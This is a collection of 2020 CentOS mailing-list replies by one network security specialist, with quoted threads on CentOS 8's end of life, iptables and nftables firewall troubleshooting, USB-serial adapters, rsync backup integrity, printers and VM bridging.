Re: [CentOS] CentOS 8 future

[Leroy Tennison]

The whole issue of "support longevity" raises an issue I've been pondering, is 
10-year support a good thing from a security perspective?  At work we use 
Ubuntu LTS which has only a five year support cycle (you can pay for an extra 
five years) but, even with that, issues have arisen.  Although they do security 
and bug fix updates, the package versions remain basically the same.  So, if a 
package is on version 1.2.3, it remains 1.2.3 with bug fixes and security 
patches for the life of the distribution. Does Red Hat/CentOS do the same thing?

The reason I ask is I ran into an issue where OpenVPN was updated in a later 
release to support a more robust security architecture which wasn't available 
until I upgraded.  A configuration change could have addressed a security 
weakness in the older version so that the issue wasn't one of a security patch. 
 However, the change required a lot of effort to implement.

Now I'm wondering about packages in general.


From: CentOS  on behalf of Lamar Owen 

Sent: Monday, December 14, 2020 10:57 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] CentOS 8 future

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
P:


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On 12/12/20 10:34 PM, Konstantin Boyandin via CentOS wrote:
> My only concern ATM is whether RH can change its CentOS 7 maintenance
> plans as well, all of a sudden.
This is what bothers me, too, but in a slightly different way.  Even for
the GPL software, Red Hat actually doesn't have to provide public access
to the source code; the only thing required by GPL is that those who
receive binaries must be able to get sources.  So, even though it has
been said that the source will be available, well, it was also said that
C8 would be supported to 2029.  There are enough packages in RHEL with
non-GPL licenses where it would be very difficult to rebuild the whole
distribution without them, and RH is not required by those licenses
(MIT, BSD, and others) to redistribute those modified sources even to
people who have been distributed binaries.  So, while I want to believe
that the sources will remain available, that belief relies on trust,
which unfortunately is less abundant these days.

So while using another rebuild seems to be a good stopgap solution, I do
wonder if it will prove to be sustainable post-2021.  I'm personally
looking at which of the four (that we know about) to possibly go to; I
just really doubt I am going to use Oracle; Rocky isn't really there yet
and is very young; Springdale is available, mature, and academically
supported (nothing wrong with that, just a statement); CloudLinux OS
Project Lenix isn't yet released.  Out of the bunch, Springdale would be
my first choice right now because it's been around a very long time and
is available now.  C8 is supposed to be around until end of 2021, so
there is some time for the dust to settle and the way to become more
clear, though.  But CentOS 8 Stream is only an option for me if the
hardware driver KABI synchronization issue is solved and stays solved.
RHEL?  Under the current subscription models we just can't afford it.
(Cost also keeps SLES out of the running.)

But I'm now seriously considering just simply going to something that is
both older than Red Hat, fully and totally open, extremely
well-supported by a diverse developer community, and used by a whole lot
of people.  Yes, that's Debian; until I realized where the name came
from (Deb and Ian) it read to me like a play on 'deviant.'  The 'stable'
period is shorter, for sure.  The tradeoffs are pretty simple:
guaranteed openness versus less change for ten years.

So, let's look at that last piece.  CentOS 6's support just ended; what
have the last nine years and three months of actual C6 support looked
like?  I supported several C6 machines, and there were distinct
c

Re: [CentOS] External harddisk

[Leroy Tennison]

I don't know whether testdisk would be helpful in this case or not but your 
options are limited, might give it a try.

From: CentOS  on behalf of H 
Sent: Friday, October 2, 2020 6:40 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] External harddisk

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


On October 1, 2020 12:03:34 PM EDT, Bruce Ferrell  wrote:
>On 9/30/20 9:11 AM, H wrote:

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com
P:


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





>> On 09/30/2020 12:03 PM, Simon Matter wrote:
>>>> Since you have taken the disk apart it will now be useless as
>within the
>>>> enclosure there could have been a vacuum or an inert gas.
>>>  From what I know gas filled disks didn't exist in the times when
>3X0GB was
>>> on a 2" drive.
>>>
>>>> You will never be able to recover any data on the disk unless you
>go and
>>>> pay
>>>> for a professional data recovery organisation to read the platters.
>>> No, if he did care that the disks didn't become dirty then the drive
>>> should still work quite well to recover what is on it. Of course the
>cover
>>> should be put on ASAP. If you don't believe me, just try it our
>yourself.
>>>
>>>> The price for a replacement 340GByte USB disk is about $25 which
>would
>>>> give
>>>> you a better product than your old disk.
>>> The OP wanted to recover what is on the disk, not use it as a normal
>disk.
>>>
>>> Simon
>>>
>>>> Mark
>>>>
>>>> -Original Message-
>>>> From: H
>>>> Sent: Wednesday, September 30, 2020 4:47 PM
>>>> To: centos@centos.org
>>>> Subject: Re: [CentOS] External harddisk
>>>>
>>>> On 09/30/2020 05:40 AM, John Pierce wrote:
>>>>> On Tue, Sep 29, 2020, 8:33 AM H  wrote:
>>>>>
>>>>>> I have an old external harddisk, Toshiba 320 Gb, with a USB
>connector
>>>>>> that
>>>>>> I wanted to check for contents. It did not start up when
>connected and
>>>>>> I
>>>>>> could not hear the motor spinning. After leaving it in the
>freezer
>>>>>> overnight the motor spins but it is not recognized by my
>computer. I
>>>>>> disassembled it and could see that the head assembly rests
>outside the
>>>>>> disk
>>>>>> but when it is powered on, the head first moves to the center of
>the
>>>>>> disk,
>>>>>> then to the periphery and finally back to the resting position.
>This
>>>>>> happens every few seconds and leaving it connected overnight
>changed
>>>>>> nothing.
>>>>>>
>>>>> That repeated seeking suggests it's not passing its self test, and
>is
>>>>> constantly retrying.   It's probably searching for servo data on
>the
>>>>> disks,
>>>>> and not finding it.
>>>>>
>>>>> ___
>>>>> CentOS mailing list
>>>>> CentOS@centos.org
>>>>> https://lists.centos.org/mailman/listinfo/centos
>>>> I see. I have not searched for any low-level disk utility from
>Toshiba,
>>>> the
>>>> manufacturer of the disk. Do you think that might be worthwhile to
>>>> hopefully
>>>> fix this?
>>>>
>>>> ___
>>>> CentOS mailing list
>>&g

Re: [CentOS] Iptables rules not working

[Leroy Tennison]

You haven't given us enough to make a good evaluation.  Is your INPUT policy 
DROP?  Is your ssh destination this system or elsewhere, it makes a difference. 
 I'm hearing iptables can still be used with nftables but I haven't had need to 
investigate, you should look into the interaction of the two to make sure 
that's not causing problems.  Just a couple or possibilities.  I don't know if 
nftables still has the raw table which allows you to do an in depth (and 
laborious) analysis of what's happening by using the -J TRACE option but, if 
you can't find the issue by other means, it may be necessary.


From: CentOS  on behalf of Phil Perry 

Sent: Thursday, July 16, 2020 10:54 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] Iptables rules not working

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On 16/07/2020 16:48, Kaushal Shriyan wrote:
> Hi,
>
> I am running CentOS Linux release 8.2.2004 (Core) on a remote server. I am
> running the below iptables command to allow SSH port 22 from a specific
> source IP 219.91.200.59
>
> iptables -A INPUT -m tcp -p tcp -s 219.91.200.59 --dport 22 -j ACCEPT
>> service iptables save
>
>
> The above iptables ruleset is not working and I am still able to connect
> from the internet to SSH port 22. I look forward to hearing from you and
> thanks in advance.
>
> Best Regards,
>
> Kaushal

EL8 does not use iptables by default - it's been replaced with nftables.


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] USB-serial adapter for CentOS 7

[Leroy Tennison]

-> "nobody uses RS232 anymore!"

Somebody needs to update the hand writing on the wall, although the physical 
hardware may be an RJ-45, the RS232 protocol is still used on headless devices 
and probably other things.  I use minicom more than I wish but it's still 
required.

From: CentOS  on behalf of mailist 

Sent: Wednesday, July 8, 2020 11:11 AM
To: CentOS mailing list 
Subject: [EXTERNAL] Re: [CentOS] USB-serial adapter for CentOS 7

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On 2020-07-08 11:28, Tate Belden wrote:
> I've several USB <-> RS-232 dongles around. As well as a few embedded
> devices. They all "Just Work (tm)" on Redhat, CentOS, Fedora, Debian,
> Raspian and Kali.

Even if you did have an RS232 port on the box, the serial drivers for
CentOS 7 have
never worked correctly.  I had an application using RS232 that worked
perfectly
under CentOS 6, and then worked intermittently under CentOS 7, and
failed miserably
on CentOS 8.  The handwriting on the RedHat wall says, "nobody uses
RS232 anymore!"
I moved the app to a Raspberry Pi 3B+, using the USB serial adapters,
and it works
perfectly again.

Todd Merriman
Software Toolz, Inc.
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] USB-serial adapter for CentOS 7

[Leroy Tennison]

I've used one on a Linux laptop, it "just worked" but the OS wasn't CentOS 7.


From: CentOS  on behalf of H 
Sent: Wednesday, July 8, 2020 10:13 AM
To: Centos Mailing List 
Subject: [EXTERNAL] [CentOS] USB-serial adapter for CentOS 7

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


I need to connect an older APS UPS unit to a machine running CentOS 7. 
Unfortunately the UPS only has a serial port whereas the computer does not. I 
am aware that there are USB-serial adapters but that the hardware or the 
drivers might fall short of expectations.

Does anyone have positive experience with such an adapter? Or, conversely, 
would recommend avoid a particular adapter?
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [OT] Bacula offsite replication

[Leroy Tennison]

Depending on the definition of offsite, you have a fundamental problem: either 
invest the time/effort compressing or take extra bandwidth, which is less 
costly?  Hopefully a delta transfer makes sense in your situation and should 
save far more than compression would once the original copy is offsite.


From: CentOS  on behalf of Valeri Galtsev 

Sent: Thursday, July 2, 2020 8:02 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On 7/2/20 3:22 AM, Alessandro Baggi wrote:
> Il 01/07/20 17:13, Leroy Tennison ha scritto:
>> I realize this shouldn't happen, the file is a tgz and isn't being
>> modified while being transmitted.  This has happened maybe three times
>> this year and unfortunately I've just had to deal with it rather than
>> invest the time to do the research.
>>
>>
>> Harriscomputer
>>
>> Leroy Tennison
>> Network Information/Cyber Security Sp
>
> Hi Leroy,
>
> I think that in my case I could not use a tgz archive. I'm speaking
> about full backups that reach 600/700GiB, compressing them and then
> rsync them could take so much time that it will be useless.
>

unless you use tape (of that high capacity), it is advantageous to
restrict volume size to, say, 50GB. Then when you restore, search for
specific files will be faster. And it will help your backup volumes
transfers as well.

Valeri

> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos

--

Valeri Galtsev
Sr System Administrator
Department of Astronomy and Astrophysics
Kavli Institute for Cosmological Physics
University of Chicago
Phone: 773-702-4247

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] [OT] Bacula offsite replication

[Leroy Tennison]

I realize this shouldn't happen, the file is a tgz and isn't being modified 
while being transmitted.  This has happened maybe three times this year and 
unfortunately I've just had to deal with it rather than invest the time to do 
the research.


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.






From: Chris Schanzle 
Sent: Wednesday, July 1, 2020 10:03 AM
To: CentOS mailing list ; Leroy Tennison 

Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


Unless the file is being modified during rsync, corruption should not happen 
with good hardware. Consider testing your RAM.  Have you noticed any other 
weird problems with that remote server, like programs crashing / daemons 
needing restarting?

On 7/1/20 10:37 AM, Leroy Tennison wrote:
> What I did was used cksum to create a checksum of the source file putting it 
> in a separate file, transmitted that via rsync as well and compared that to a 
> cksum computed on the remote end.  There are far more accurate alternatives 
> to cksum but I felt cksum was good enough for a basic check.  Like most 
> things in the UNIX world, there are probably other ways to do this as well.
>
> Interestingly enough, after I sent my previous response I discovered that I 
> had yet another instance of the problem.
>
> 
> From: CentOS  on behalf of Alessandro Baggi 
> 
> Sent: Wednesday, July 1, 2020 9:26 AM
> To: centos@centos.org 
> Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication
>
> CAUTION: This email originated from outside of the organization. Do not click 
> links or open attachments unless you recognize the sender and know the 
> content is safe.
>
>
> Hi Leroy,
>
> How I can confirm that during rsync transfer corruption are not encountered?
>
> Thank you in advance.
>
>
> Harriscomputer
>
> Leroy Tennison
> Network Information/Cyber Security Specialist
> E: le...@datavoiceint.com
>
>
> [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]
>
>
> 2220 Bush Dr
> McKinney, Texas
> 75070
> https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fwww.datavoiceint.com%2f=E,1,00uoVithcdoZKfdE0IJM8LvvYxwVLFDjVaj-PErs6HOprVgQbdBE1Ev3mXF3w6PUc_C_6eI1odWQtpYUTMU3wRbhn6gDS_pSCiRBZdG-fqPzGNsgh2ZNZFujh1s,=1>
>
>
> This message has been sent on behalf of a company that is part of the Harris 
> Operating Group of Constellation Software Inc.
>
> If you prefer not to be contacted by Harris Operating Group please notify 
> us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,ESghWsZAKB3kZUcHUH6MS2ivZGjhaE3linFZeLtQ96hbUtv37Esy1OON4XdoFr1DjlanYK_dt8Kie6diqCOVrkPalJ6KDLXEocN-5BFabl2AiHWvFfo3VvM,=1>.
>
>
>
> This message is intended exclusively for the individual or entity to which it 
> is addressed. This communication may contain information that is proprietary, 
> privileged or confidential or otherwise legally exempt from disclosure. If 
> you are not the named addressee, you are not authorized to read, print, 
> retain, copy or disseminate this message or any part of it. If you have 
> received this message in error, please notify the sender immediately by 
> e-mail and delete all copies of the message.
>
>
>
>
>
> Il 01/07/20 16:04, Leroy Tennison ha scritto:
>> I've used rsync (but probably not for the size you're referring to), it 
>> works and has enough features to meet most needs.  I have had a single 
>> situation where corruption occurred during transfer (a few times, have no 
>> idea why), might want to independently confirm the integrity of the transfer.
>>
>> _

Re: [CentOS] [OT] Bacula offsite replication

[Leroy Tennison]

What I did was used cksum to create a checksum of the source file putting it in 
a separate file, transmitted that via rsync as well and compared that to a 
cksum computed on the remote end.  There are far more accurate alternatives to 
cksum but I felt cksum was good enough for a basic check.  Like most things in 
the UNIX world, there are probably other ways to do this as well.

Interestingly enough, after I sent my previous response I discovered that I had 
yet another instance of the problem.


From: CentOS  on behalf of Alessandro Baggi 

Sent: Wednesday, July 1, 2020 9:26 AM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] [OT] Bacula offsite replication

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


Hi Leroy,

How I can confirm that during rsync transfer corruption are not encountered?

Thank you in advance.


Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





Il 01/07/20 16:04, Leroy Tennison ha scritto:
> I've used rsync (but probably not for the size you're referring to), it works 
> and has enough features to meet most needs.  I have had a single situation 
> where corruption occurred during transfer (a few times, have no idea why), 
> might want to independently confirm the integrity of the transfer.
>
> 
> From: CentOS  on behalf of Alessandro Baggi 
> 
> Sent: Wednesday, July 1, 2020 5:26 AM
> To: centos@centos.org 
> Subject: [EXTERNAL] [CentOS] [OT] Bacula offsite replication
>
> CAUTION: This email originated from outside of the organization. Do not click 
> links or open attachments unless you recognize the sender and know the 
> content is safe.
>
>
> Hi everyone,
>
> I have updated my backup server to CentOS 8.2. It runs bacula performing
> backup on disks. I would like to replicate backups on another offsite
> machine.
>
> I read about the ability to configure a new storage daemon in the
> offsite location and create a Migration/Copy Jobs. If I'm not wrong, it
> replicates only volumes but not replicate the catalog. I will try this.
>
> Another way to replicate the volumes on another server is using rsync.
>
> What is your suggestion about this topic?
>
> Thank you in advance.
>
> Alessandro.
>
> ___
> CentOS mailing list
> CentOS@centos.org
> https://lists.centos.org/mailman/listinfo/centos
>
> Harriscomputer
>
> Leroy Tennison
> Network Information/Cyber Security Specialist
> E: le...@datavoiceint.com
>
>
> [cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]
>
>
> 2220 Bush Dr
> McKinney, Texas
> 75070
> https://linkprotect.cudasvc.com/url?a=https%3a%2f%2fwww.datavoiceint.com=E,1,NcuZo7bJlNfnwFN_1U7Eb0PpothLaHlm35UVdQMBqG8TH6hZvo3iMVLxCy4ZNUIAWOktkvYozTYnDWfj0JIvc22V52YUkDfms1NFI7AXHA,,=1<http://www..com>
>
>
> This message has been sent on behalf of a company that is part of the Harris 
> Operating Group of Constellation Software Inc.
>
> If you prefer not to be contacted by Harris Operating Group please notify 
> us<https://linkprotect.cudasvc.com/url?a=http%3a%2f%2fsubscribe.harriscomputer.com%2f=E,1,4UMyprULKejN76Lk4p9zM-laz6VtwtLbbjIU8e02p6oWiLS-njfZsTFuXkb0910-WrqQ8x6J4YCieJO5HeN2WGf7pqwFdtVkKJi-m_QGliIsyR6XTAVohBrv=1>.
>
>
>
> This message is intended exclusively for the individual or entity to which it 
> is addressed. This communication may contain information that is proprietary, 
> privileged or confidential or otherwise legally exempt from disclosure. If 
> you are not the named addressee, you are not authorized to read, print, 
> retain, copy or disseminate this message or any part of it. If you have 
> received this message in error, plea

[CentOS] [OT] Bacula offsite replication

[Leroy Tennison]

I've used rsync (but probably not for the size you're referring to), it works 
and has enough features to meet most needs.  I have had a single situation 
where corruption occurred during transfer (a few times, have no idea why), 
might want to independently confirm the integrity of the transfer.


From: CentOS  on behalf of Alessandro Baggi 

Sent: Wednesday, July 1, 2020 5:26 AM
To: centos@centos.org 
Subject: [EXTERNAL] [CentOS] [OT] Bacula offsite replication

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


Hi everyone,

I have updated my backup server to CentOS 8.2. It runs bacula performing
backup on disks. I would like to replicate backups on another offsite
machine.

I read about the ability to configure a new storage daemon in the
offsite location and create a Migration/Copy Jobs. If I'm not wrong, it
replicates only volumes but not replicate the catalog. I will try this.

Another way to replicate the volumes on another server is using rsync.

What is your suggestion about this topic?

Thank you in advance.

Alessandro.

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Re: [CentOS] HP vs. Brother Printers: Use with Centos/Fedora

[Leroy Tennison]

Our office has had a Brother MFC-8510DN for at least five years - no issues.  
As has been said below, you do have to download and install the driver but the 
process hasn't been problematic.  Having said that, I haven't pushed the limit 
on it's capabilities, just done rather plain printing.


From: CentOS  on behalf of Ron Loftin 

Sent: Saturday, June 27, 2020 5:02 PM
To: centos@centos.org 
Subject: [EXTERNAL] Re: [CentOS] HP vs. Brother Printers: Use with Centos/Fedora

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.



Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.





On Sat, 2020-06-27 at 15:44 -0600, Frank Cox wrote:
> On Sat, 27 Jun 2020 17:33:39 -0400
> Jay Hart wrote:
>
> >
> > If you had to rate which printer brand works better with Linux
> > (Fedora and
> > Centos), what would it be?
> Any Brother printer that I've ever had the misfortune to have to deal
> with either didn't work at all or if could be made to work, it didn't
> work for long.
>
> If it's a Brother, run away as fast as you can.  They're the cheapest
> crappiest thing you can possibly imagine.
>
> My wife makes quilts and says the same thing about Brother sewing
> machines.
>

I can't speak to the sewing machines, but I have to say that I've had
very good luck with Brother printers.  However, we have to be honest
and acknowledge that I'm talking about LASER printers, not the $%^&*
inkjet silliness.

In my DEFINITELY not-so-humble opinion, the "run away as fast as you
can" advice applies to ALL inkjets that are intended for home use.

The only real differences I'm aware of between Brother and HP LASER
printers are price, and the fact that the HP drivers are usually
included in the distribution by default, and you have to download and
install the Brother drivers.  I'm sitting next to a Brother MFC L-
2750DW that is a year or so old, and it does everything I need it to.

As always, YMMV.

--
Ron Loftin  relof...@twcny.rr.com

"God, root, what is difference ?"   Piter from UserFriendly


___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos
___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] firewall help request

[Leroy Tennison]

Is your policy accept?  It is possible to trace the packet through the 
netfilter path by setting up raw table rules with TRACE as the target and 
logging turned on (search the web for details - probably too much to post here) 
but be aware that you need a very controlled test because the syslog entries 
will likely be an order of magnitude greater than the actual packet count.


From: CentOS  on behalf of david 
Sent: Tuesday, June 16, 2020 2:21 PM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] firewall help request

CAUTION: This email originated from outside of the organization. Do not click 
links or open attachments unless you recognize the sender and know the content 
is safe.


Folks

I'm struggling with my firewall settings, and would appreciate some help.

I have a gateway machine (currently Centos 7 with IPV4 only) with two
NICs.  One is connected to the internet, the other to an internal
network (10.0.0.0/24) of mixed hardware (windows7, android tablets,
android phones, linux boxes) using NAT.  I wish to block all outgoing
connects to any external IP address on port 22 (ssh) originating from
any internal machine except one (which has a known internal IP address).

I've tried some commands using 'iptables' to accomplish this, but so
far have failed.  If anyone has a suggestion, I'd really appreciate
it.  In addition, a suitable version for 'firewalld' could be useful,
as an upgrade to Centos 8 is in plan.

Examples of what I've tried, and then tested.  None of them stopped
an outgoing SSH from an internal system.

   iptables -I INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j DROP
   iptables -I INPUT -p tcp --dport 22 -s 10.0.0.0/24 -j DROP

Much thanks

David

___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

Harriscomputer

Leroy Tennison
Network Information/Cyber Security Specialist
E: le...@datavoiceint.com


[cid:Data-Voice-International-LOGO_aa3d1c6e-5cfb-451f-ba2c-af8059e69609.PNG]


2220 Bush Dr
McKinney, Texas
75070
www.datavoiceint.com<http://www..com>


This message has been sent on behalf of a company that is part of the Harris 
Operating Group of Constellation Software Inc.

If you prefer not to be contacted by Harris Operating Group please notify 
us<http://subscribe.harriscomputer.com/>.



This message is intended exclusively for the individual or entity to which it 
is addressed. This communication may contain information that is proprietary, 
privileged or confidential or otherwise legally exempt from disclosure. If you 
are not the named addressee, you are not authorized to read, print, retain, 
copy or disseminate this message or any part of it. If you have received this 
message in error, please notify the sender immediately by e-mail and delete all 
copies of the message.




___
CentOS mailing list
CentOS@centos.org
https://lists.centos.org/mailman/listinfo/centos

[CentOS] Bridge network for virt-manager

[Leroy Tennison]

I haven't done bridging on CentOS but, in the setups I've done, you need to 
associate a physical NIC such as eth0 with the bridge.


From: CentOS  on behalf of Jerry Geis 

Sent: Tuesday, June 2, 2020 5:38 AM
To: CentOS mailing list 
Subject: [EXTERNAL] [CentOS] Bridge network for virt-manager

